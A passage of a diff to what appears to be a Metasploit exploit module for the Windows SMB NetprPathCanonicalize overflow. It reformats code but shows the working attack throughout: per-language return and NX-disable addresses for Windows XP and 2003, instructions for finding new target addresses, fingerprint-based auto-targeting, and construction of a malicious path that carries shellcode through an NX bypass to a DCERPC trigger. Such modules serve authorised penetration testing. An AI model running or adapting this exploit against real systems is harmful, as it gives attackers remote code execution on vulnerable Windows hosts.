           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Arabic (NX)',
-            {
-              'Ret'       => 0x6fd8f807,
-              'DisableNX' => 0x6fd917c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP2 Turkish (NX)',
+           {
+             'Ret'       => 0x5a78f727,
+             'DisableNX' => 0x5a7916e2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
-            {
-              'Ret'       => 0x5860f807,
-              'DisableNX' => 0x586117c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Arabic (NX)',
+           {
+             'Ret'       => 0x6fd8f807,
+             'DisableNX' => 0x6fd917c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Chinese - Simplified (NX)',
-            {
-              'Ret'       => 0x58fbf807,
-              'DisableNX' => 0x58fc17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
+           {
+             'Ret'       => 0x5860f807,
+             'DisableNX' => 0x586117c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Chinese - Traditional (NX)',
-            {
-              'Ret'       => 0x5860f807,
-              'DisableNX' => 0x586117c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Chinese - Simplified (NX)',
+           {
+             'Ret'       => 0x58fbf807,
+             'DisableNX' => 0x58fc17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Czech (NX)',
-            {
-              'Ret'       => 0x6fe1f807,
-              'DisableNX' => 0x6fe217c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Chinese - Traditional (NX)',
+           {
+             'Ret'       => 0x5860f807,
+             'DisableNX' => 0x586117c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Danish (NX)',
-            {
-              'Ret'       => 0x5978f807,
-              'DisableNX' => 0x597917c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Czech (NX)',
+           {
+             'Ret'       => 0x6fe1f807,
+             'DisableNX' => 0x6fe217c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 German (NX)',
-            {
-              'Ret'       => 0x6fd9f807,
-              'DisableNX' => 0x6fda17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Danish (NX)',
+           {
+             'Ret'       => 0x5978f807,
+             'DisableNX' => 0x597917c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Greek (NX)',
-            {
-              'Ret'       => 0x592af807,
-              'DisableNX' => 0x592b17c2,
-              'Scratch'   => 0x00020408
-            }
-          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
-
-
-          # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Spanish (NX)',
-            {
-              'Ret'       => 0x6fdbf807,
-              'DisableNX' => 0x6fdc17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 German (NX)',
+           {
+             'Ret'       => 0x6fd9f807,
+             'DisableNX' => 0x6fda17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Finnish (NX)',
-            {
-              'Ret'       => 0x597df807,
-              'DisableNX' => 0x597e17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Greek (NX)',
+           {
+             'Ret'       => 0x592af807,
+             'DisableNX' => 0x592b17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 French (NX)',
-            {
-              'Ret'       => 0x595bf807,
-              'DisableNX' => 0x595c17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Spanish (NX)',
+           {
+             'Ret'       => 0x6fdbf807,
+             'DisableNX' => 0x6fdc17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Hebrew (NX)',
-            {
-              'Ret'       => 0x5940f807,
-              'DisableNX' => 0x594117c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Finnish (NX)',
+           {
+             'Ret'       => 0x597df807,
+             'DisableNX' => 0x597e17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Hungarian (NX)',
-            {
-              'Ret'       => 0x5970f807,
-              'DisableNX' => 0x597117c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 French (NX)',
+           {
+             'Ret'       => 0x595bf807,
+             'DisableNX' => 0x595c17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Italian (NX)',
-            {
-              'Ret'       => 0x596bf807,
-              'DisableNX' => 0x596c17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Hebrew (NX)',
+           {
+             'Ret'       => 0x5940f807,
+             'DisableNX' => 0x594117c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Japanese (NX)',
-            {
-              'Ret'       => 0x567fd4d2,
-              'DisableNX' => 0x568017c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Hungarian (NX)',
+           {
+             'Ret'       => 0x5970f807,
+             'DisableNX' => 0x597117c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Korean (NX)',
-            {
-              'Ret'       => 0x6fd6f807,
-              'DisableNX' => 0x6fd717c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Italian (NX)',
+           {
+             'Ret'       => 0x596bf807,
+             'DisableNX' => 0x596c17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Dutch (NX)',
-            {
-              'Ret'       => 0x596cf807,
-              'DisableNX' => 0x596d17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Japanese (NX)',
+           {
+             'Ret'       => 0x567fd4d2,
+             'DisableNX' => 0x568017c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Norwegian (NX)',
-            {
-              'Ret'       => 0x597cf807,
-              'DisableNX' => 0x597d17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Korean (NX)',
+           {
+             'Ret'       => 0x6fd6f807,
+             'DisableNX' => 0x6fd717c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Polish (NX)',
-            {
-              'Ret'       => 0x5941f807,
-              'DisableNX' => 0x594217c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Dutch (NX)',
+           {
+             'Ret'       => 0x596cf807,
+             'DisableNX' => 0x596d17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Portuguese - Brazilian (NX)',
-            {
-              'Ret'       => 0x596ff807,
-              'DisableNX' => 0x597017c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Norwegian (NX)',
+           {
+             'Ret'       => 0x597cf807,
+             'DisableNX' => 0x597d17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Portuguese (NX)',
-            {
-              'Ret'       => 0x596bf807,
-              'DisableNX' => 0x596c17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Polish (NX)',
+           {
+             'Ret'       => 0x5941f807,
+             'DisableNX' => 0x594217c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Russian (NX)',
-            {
-              'Ret'       => 0x6fe1f807,
-              'DisableNX' => 0x6fe217c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Portuguese - Brazilian (NX)',
+           {
+             'Ret'       => 0x596ff807,
+             'DisableNX' => 0x597017c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Swedish (NX)',
-            {
-              'Ret'       => 0x597af807,
-              'DisableNX' => 0x597b17c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Portuguese (NX)',
+           {
+             'Ret'       => 0x596bf807,
+             'DisableNX' => 0x596c17c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Metasploit's NX bypass for XP SP2/SP3
-          [ 'Windows XP SP3 Turkish (NX)',
-            {
-              'Ret'       => 0x5a78f807,
-              'DisableNX' => 0x5a7917c2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows XP SP3 Russian (NX)',
+           {
+             'Ret'       => 0x6fe1f807,
+             'DisableNX' => 0x6fe217c2,
+             'Scratch'   => 0x00020408
+           }
+          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
+
+          # Metasploit's NX bypass for XP SP2/SP3
+          ['Windows XP SP3 Swedish (NX)',
+           {
+             'Ret'       => 0x597af807,
+             'DisableNX' => 0x597b17c2,
+             'Scratch'   => 0x00020408
+           }
+          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
+
+          # Metasploit's NX bypass for XP SP2/SP3
+          ['Windows XP SP3 Turkish (NX)',
+           {
+             'Ret'       => 0x5a78f807,
+             'DisableNX' => 0x5a7917c2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
           # Standard return-to-ESI without NX bypass
           # Provided by Masashi Fujiwara
-          [ 'Windows 2003 SP2 Japanese (NO NX)',
-            {
-              'Ret'       => 0x71a91ed2,
-              'Scratch'   => 0x00020408
-            }
+          ['Windows 2003 SP2 Japanese (NO NX)',
+           {
+             'Ret'       => 0x71a91ed2,
+             'Scratch'   => 0x00020408
+           }
           ], # JMP ESI WS2HELP.DLL
 
           # Standard return-to-ESI without NX bypass
-          [ 'Windows 2003 SP1 Spanish (NO NX)',
-            {
-              'Ret'       => 0x71ac21a2,
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP1 Spanish (NO NX)',
+           {
+             'Ret'       => 0x71ac21a2,
+             'Scratch'   => 0x00020408,
+           }
           ], # JMP ESI WS2HELP.DLL
 
           # Brett Moore's crafty NX bypass for 2003 SP1
-          [ 'Windows 2003 SP1 Spanish (NX)',
-            {
-              'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
-              'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
-              'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
-              'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP1 Spanish (NX)',
+           {
+             'RetDec'    => 0x7c90568c,  # dec ESI, ret @SHELL32.DLL
+             'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
           ],
 
           # Standard return-to-ESI without NX bypass
-          [ 'Windows 2003 SP2 Spanish (NO NX)',
-            {
-              'Ret'       => 0x71ac3969,
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP2 Spanish (NO NX)',
+           {
+             'Ret'       => 0x71ac3969,
+             'Scratch'   => 0x00020408,
+           }
           ], # JMP ESI WS2HELP.DLL
 
           # Brett Moore's crafty NX bypass for 2003 SP2
-          [ 'Windows 2003 SP2 Spanish (NX)',
-            {
-              'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
-              'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
-              'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
-              'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
-              'Scratch'   => 0x00020408,
-            }
+          ['Windows 2003 SP2 Spanish (NX)',
+           {
+             'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
+             'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+             'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
+             'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
+             'Scratch'   => 0x00020408,
+           }
           ]
 
           #
@@ -708,105 +697,100 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
+        OptString.new('SMBPIPE', [true,  'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),
       ], self.class)
-
   end
 
-
-=begin
-
-
-  *** WINDOWS XP SP2/SP3 TARGETS ***
-
-
-  This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
-  for the process and then returns back to a call ESI instruction. These addresses are different
-  between operating systems, service packs, and language packs, but the steps below can be used to
-  add new targets.
-
-
-  If the target system does not have NX/NX, just place a "call ESI" return into both the Ret	and
-  DisableNX elements of the target hash.
-
-  If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
-  First obtain the value for the Ret element of the hash with the following command:
-
-  $ msfpescan -j esi acgenral.dll
-
-  Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
-
-  Next, find the location of the function we use to disable NX. Use the following command:
-
-  $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
-
-  This address should be placed into the DisableNX element of the target hash.
-
-  The Scratch element of 0x00020408 should work on all versions of Windows
-
-  The actual function we use to disable NX looks like this:
-
-    push    4
-    lea     eax, [ebp+arg_0]
-    push    eax
-    push    22h
-    push    0FFFFFFFFh
-    mov     [ebp+arg_0], 2
-    call    ds:__imp__NtSetInformationProcess@16
-
-
-  *** WINDOWS XP NON-NX TARGETS ***
-
-
-  Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
-  jump, and finally the shellcode.
-
-
-  *** WINDOWS 2003 SP2 TARGETS ***
-
-
-  There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
-  both of these are inside NTDLL.DLL and use a return method that is not directly compatible
-  with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
-  that eventually leads to the NX bypass function.
-
-
-  *** WINDOWS 2000 TARGETS ***
-
-
-  No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
-  jump, and finally the shellcode.
-
-
-  *** WINDOWS VISTA TARGETS ***
-
-  Currently untested, will involve ASLR and NX, should be fun.
-
-
-  *** NetprPathCanonicalize IDL ***
-
-
-  NET_API_STATUS NetprPathCanonicalize(
-  [in, string, unique] SRVSVC_HANDLE ServerName,
-  [in, string] WCHAR* PathName,
-  [out, size_is(OutbufLen)] unsigned char* Outbuf,
-  [in, range(0,64000)] DWORD OutbufLen,
-  [in, string] WCHAR* Prefix,
-  [in, out] DWORD* PathType,
-  [in] DWORD Flags
-  );
-
-=end
+  #
+  #
+  #   *** WINDOWS XP SP2/SP3 TARGETS ***
+  #
+  #
+  #   This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
+  #   for the process and then returns back to a call ESI instruction. These addresses are different
+  #   between operating systems, service packs, and language packs, but the steps below can be used to
+  #   add new targets.
+  #
+  #
+  #   If the target system does not have NX/NX, just place a "call ESI" return into both the Ret	and
+  #   DisableNX elements of the target hash.
+  #
+  #   If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
+  #   First obtain the value for the Ret element of the hash with the following command:
+  #
+  #   $ msfpescan -j esi acgenral.dll
+  #
+  #   Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
+  #
+  #   Next, find the location of the function we use to disable NX. Use the following command:
+  #
+  #   $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
+  #
+  #   This address should be placed into the DisableNX element of the target hash.
+  #
+  #   The Scratch element of 0x00020408 should work on all versions of Windows
+  #
+  #   The actual function we use to disable NX looks like this:
+  #
+  #     push    4
+  #     lea     eax, [ebp+arg_0]
+  #     push    eax
+  #     push    22h
+  #     push    0FFFFFFFFh
+  #     mov     [ebp+arg_0], 2
+  #     call    ds:__imp__NtSetInformationProcess@16
+  #
+  #
+  #   *** WINDOWS XP NON-NX TARGETS ***
+  #
+  #
+  #   Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
+  #   jump, and finally the shellcode.
+  #
+  #
+  #   *** WINDOWS 2003 SP2 TARGETS ***
+  #
+  #
+  #   There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
+  #   both of these are inside NTDLL.DLL and use a return method that is not directly compatible
+  #   with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
+  #   that eventually leads to the NX bypass function.
+  #
+  #
+  #   *** WINDOWS 2000 TARGETS ***
+  #
+  #
+  #   No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
+  #   jump, and finally the shellcode.
+  #
+  #
+  #   *** WINDOWS VISTA TARGETS ***
+  #
+  #   Currently untested, will involve ASLR and NX, should be fun.
+  #
+  #
+  #   *** NetprPathCanonicalize IDL ***
+  #
+  #
+  #   NET_API_STATUS NetprPathCanonicalize(
+  #   [in, string, unique] SRVSVC_HANDLE ServerName,
+  #   [in, string] WCHAR* PathName,
+  #   [out, size_is(OutbufLen)] unsigned char* Outbuf,
+  #   [in, range(0,64000)] DWORD OutbufLen,
+  #   [in, string] WCHAR* Prefix,
+  #   [in, out] DWORD* PathType,
+  #   [in] DWORD Flags
+  #   );
+  #
 
   def exploit
-
     begin
-      connect()
-      smb_login()
+      connect
+      smb_login
     rescue Rex::Proto::SMB::Exceptions::LoginError => e
-      if (e.message =~ /Connection reset/)
-        print_error("Connection reset during login")
-        print_error("This most likely means a previous exploit attempt caused the service to crash")
+      if e.message =~ /Connection reset/
+        print_error('Connection reset during login')
+        print_error('This most likely means a previous exploit attempt caused the service to crash')
         return
       else
         raise e
@@ -816,74 +800,73 @@ class Metasploit3 < Msf::Exploit::Remote
     # Use a copy of the target
     mytarget = target
 
-
-    if(target['auto'])
+    if target['auto']
 
       mytarget = nil
 
-      print_status("Automatically detecting the target...")
-      fprint = smb_fingerprint()
+      print_status('Automatically detecting the target...')
+      fprint = smb_fingerprint
 
       print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")
 
       # Bail early on unknown OS
-      if(fprint['os'] == 'Unknown')
-        fail_with(Failure::NoTarget, "No matching target")
+      if (fprint['os'] == 'Unknown')
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       # Windows 2000 is mostly universal
-      if(fprint['os'] == 'Windows 2000')
-        mytarget = self.targets[1]
+      if (fprint['os'] == 'Windows 2000')
+        mytarget = targets[1]
       end
 
       # Windows XP SP0/SP1 is mostly universal
-      if(fprint['os'] == 'Windows XP' and fprint['sp'] == "Service Pack 0 / 1")
-        mytarget = self.targets[2]
+      if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'
+        mytarget = targets[2]
       end
 
       # Windows 2003 SP0 is mostly universal
-      if(fprint['os'] == 'Windows 2003' and fprint['sp'] == "No Service Pack")
-        mytarget = self.targets[7]
+      if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
+        mytarget = targets[7]
       end
 
       # Windows 2003 R2 is treated the same as 2003
-      if(fprint['os'] == 'Windows 2003 R2')
+      if (fprint['os'] == 'Windows 2003 R2')
         fprint['os'] = 'Windows 2003'
       end
 
       # Service Pack match must be exact
-      if((not mytarget) and fprint['sp'].index('+'))
-        print_error("Could not determine the exact service pack")
+      if (not mytarget) and fprint['sp'].index('+')
+        print_error('Could not determine the exact service pack')
         print_status("Auto-targeting failed, use 'show targets' to manually select one")
         disconnect
         return
       end
 
       # Language Pack match must be exact or we default to English
-      if((not mytarget) and fprint['lang'] == 'Unknown')
-        print_status("We could not detect the language pack, defaulting to English")
+      if (not mytarget) and fprint['lang'] == 'Unknown'
+        print_status('We could not detect the language pack, defaulting to English')
         fprint['lang'] = 'English'
       end
 
       # Normalize the service pack string
       fprint['sp'].gsub!(/Service Pack\s+/, 'SP')
 
-      if(not mytarget)
-        self.targets.each do |t|
+      unless mytarget
+        targets.each do |t|
           # Prefer AlwaysOn NX over NX, and NX over non-NX
-          if(t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/)
+          if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/
             mytarget = t
             break
           end
-          if(t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/)
+          if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/
             mytarget = t
             break
           end
         end
       end
 
-      if(not mytarget)
-        fail_with(Failure::NoTarget, "No matching target")
+      unless mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       print_status("Selected Target: #{mytarget.name}")
@@ -893,42 +876,41 @@ class Metasploit3 < Msf::Exploit::Remote
     # Build the malicious path name
     #
 
-    padder = [*("A".."Z")]
-    pad = "A"
-    while(pad.length < 7)
+    padder = [*('A'..'Z')]
+    pad = 'A'
+    while pad.length < 7
       c = padder[rand(padder.length)]
       next if pad.index(c)
       pad += c
     end
 
-    prefix = "\\"
-    path   = ""
-    server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
-
+    prefix = '\\'
+    path   = ''
+    server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
 
     #
     # Windows 2003 SP2 (NX) targets
     #
-    if(mytarget['RetDec'])
+    if mytarget['RetDec']
 
       jumper = Rex::Text.rand_text_alpha(70).upcase
-      jumper[ 0,4] = [mytarget['RetDec']].pack("V")# one more to Align and make room
+      jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room
 
-      jumper[ 4,4] = [mytarget['RetDec']].pack("V") # 4 more for space
-      jumper[ 8,4] = [mytarget['RetDec']].pack("V")
-      jumper[ 12,4] = [mytarget['RetDec']].pack("V")
-      jumper[ 16,4] = [mytarget['RetDec']].pack("V")
+      jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space
+      jumper[ 8, 4] = [mytarget['RetDec']].pack('V')
+      jumper[ 12, 4] = [mytarget['RetDec']].pack('V')
+      jumper[ 16, 4] = [mytarget['RetDec']].pack('V')
 
-      jumper[ 20,4] = [mytarget['RetPop']].pack("V")# pop to EBP
-      jumper[ 24,4] = [mytarget['DisableNX']].pack("V")
+      jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP
+      jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')
 
-      jumper[ 56,4] = [mytarget['JmpESP']].pack("V")
-      jumper[ 60,4] = [mytarget['JmpESP']].pack("V")
-      jumper[ 64,2] = "\xeb\x02"                    # our jump
-      jumper[ 68,2] = "\xeb\x62"                    # original
+      jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')
+      jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')
+      jumper[ 64, 2] = "\xeb\x02"                    # our jump
+      jumper[ 68, 2] = "\xeb\x62"                    # original
 
       path =
-        Rex::Text.to_unicode("\\") +
+        Rex::Text.to_unicode('\\') +
 
         # This buffer is removed from the front
         Rex::Text.rand_text_alpha(100) +
@@ -937,16 +919,16 @@ class Metasploit3 < Msf::Exploit::Remote
         payload.encoded +
 
         # Relative path to trigger the bug
-        Rex::Text.to_unicode("\\..\\..\\") +
+        Rex::Text.to_unicode('\\..\\..\\') +
 
         # Extra padding
         Rex::Text.to_unicode(pad) +
 
         # Writable memory location (static)
-        [mytarget['Scratch']].pack("V") + # EBP
+        [mytarget['Scratch']].pack('V') + # EBP
 
         # Return to code which disables NX (or just the return)
-        [mytarget['RetDec']].pack("V") +
+        [mytarget['RetDec']].pack('V') +
 
         # Padding with embedded jump
         jumper +
@@ -957,12 +939,12 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     # Windows XP SP2/SP3 ROP Stager targets
     #
-    elsif(mytarget['UseROP'])
+    elsif mytarget['UseROP']
 
       rop = generate_rop(mytarget['UseROP'])
 
       path =
-        Rex::Text.to_unicode("\\") +
+        Rex::Text.to_unicode('\\') +
 
         # This buffer is removed from the front
         Rex::Text.rand_text_alpha(100) +
@@ -971,7 +953,7 @@ class Metasploit3 < Msf::Exploit::Remote
         payload.encoded +
 
         # Relative path to trigger the bug
-        Rex::Text.to_unicode("\\..\\..\\") +
+        Rex::Text.to_unicode('\\..\\..\\') +
 
         # Extra padding
         Rex::Text.to_unicode(pad) +
@@ -991,12 +973,12 @@ class Metasploit3 < Msf::Exploit::Remote
     else
 
       jumper = Rex::Text.rand_text_alpha(70).upcase
-      jumper[ 4,4] = [mytarget.ret].pack("V")
-      jumper[50,8] = make_nops(8)
-      jumper[58,2] = "\xeb\x62"
+      jumper[ 4, 4] = [mytarget.ret].pack('V')
+      jumper[50, 8] = make_nops(8)
+      jumper[58, 2] = "\xeb\x62"
 
       path =
-        Rex::Text.to_unicode("\\") +
+        Rex::Text.to_unicode('\\') +
 
         # This buffer is removed from the front
         Rex::Text.rand_text_alpha(100) +
@@ -1005,16 +987,16 @@ class Metasploit3 < Msf::Exploit::Remote
         payload.encoded +
 
         # Relative path to trigger the bug
-        Rex::Text.to_unicode("\\..\\..\\") +
+        Rex::Text.to_unicode('\\..\\..\\') +
 
         # Extra padding
         Rex::Text.to_unicode(pad) +
 
         # Writable memory location (static)
-        [mytarget['Scratch']].pack("V") + # EBP
+        [mytarget['Scratch']].pack('V') + # EBP
 
         # Return to code which disables NX (or just the return)
-        [ mytarget['DisableNX'] || mytarget.ret ].pack("V") +
+        [mytarget['DisableNX'] || mytarget.ret].pack('V') +
 
         # Padding with embedded jump
         jumper +
@@ -1040,7 +1022,7 @@ class Metasploit3 < Msf::Exploit::Remote
       NDR.long(0)
 
     # NOTE: we don't bother waiting for a response here...
-    print_status("Attempting to trigger the vulnerability...")
+    print_status('Attempting to trigger the vulnerability...')
     dcerpc.call(0x1f, stub, false)
 
     # Cleanup
@@ -1050,15 +1032,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     begin
-      connect()
-      smb_login()
+      connect
+      smb_login
     rescue Rex::ConnectionError => e
       vprint_error("Connection failed: #{e.class}: #{e}")
       return Msf::Exploit::CheckCode::Unknown
     rescue Rex::Proto::SMB::Exceptions::LoginError => e
-      if (e.message =~ /Connection reset/)
-        vprint_error("Connection reset during login")
-        vprint_error("This most likely means a previous exploit attempt caused the service to crash")
+      if e.message =~ /Connection reset/
+        vprint_error('Connection reset during login')
+        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
         return Msf::Exploit::CheckCode::Unknown
       else
         raise e
